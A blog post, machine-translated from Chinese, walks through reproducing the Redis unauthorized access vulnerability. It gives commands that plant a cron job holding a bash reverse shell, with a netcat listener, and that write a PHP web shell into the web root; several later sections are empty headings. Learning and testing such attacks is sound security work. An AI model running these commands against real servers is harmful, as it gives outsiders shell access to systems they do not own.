xfeng

xfeng

健身 技术 阅读 思考 记录
tg_channel
tg_channel
github
bilibili
tg_channel
HomePortfoliosArchivesAbout

Redis Unauthorized Access Vulnerability Reproduction

#未授权访问#漏洞复现83
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses the Redis unauthorized access vulnerability, which can expose the Redis service to the public without proper security measures. Attackers can exploit this vulnerability to access and manipulate Redis data, execute commands, and even plant webshells on the target server. Various methods of exploiting the vulnerability, such as using scheduled tasks to bounce shells, writing webshells, logging into SSH with Redis keys, and exploiting master-slave replication for remote code execution, are also mentioned. The article provides tools and references for further exploration of the topic.

1. Vulnerability Introduction#

By default, Redis is bound to 0.0.0.0:6379. If no relevant strategies, such as adding firewall rules to prevent access from non-trusted IP addresses, are implemented, Redis will be exposed to the public network. If no password authentication is set (usually empty), any user can access Redis and read its data when they have access to the target server without authorization.

Attackers can exploit the unauthorized access vulnerability by using Redis's own config command to log in to the target server, add scheduled tasks, write web shells, and perform other operations.

The following operations are performed under the premise of an existing Redis unauthorized access vulnerability.

2. Using Scheduled Tasks to Reverse Shell#

Connection Tool: https://github.com/caoxinyu/RedisClient/releases

https://github.com/dmajkic/redis/downloads

Run the following command on the compromised host connected to the vulnerability:

set xx "\n* * * * * bash -i >& /dev/tcp/IP Address/Port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

Run the following command locally:

nc -lvnp Port

3. Writing a Web Shell in Redis#

config set dir /var/www/html
config set dbfilename test123.php
set webshell "<?php phpinfo(); ?>"
save

4. Logging in to SSH with Redis Keys#

5. Exploiting Master-Slave Replication RCE#

6. SSRF Redis Reverse Shell#

7. Reference Video#

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.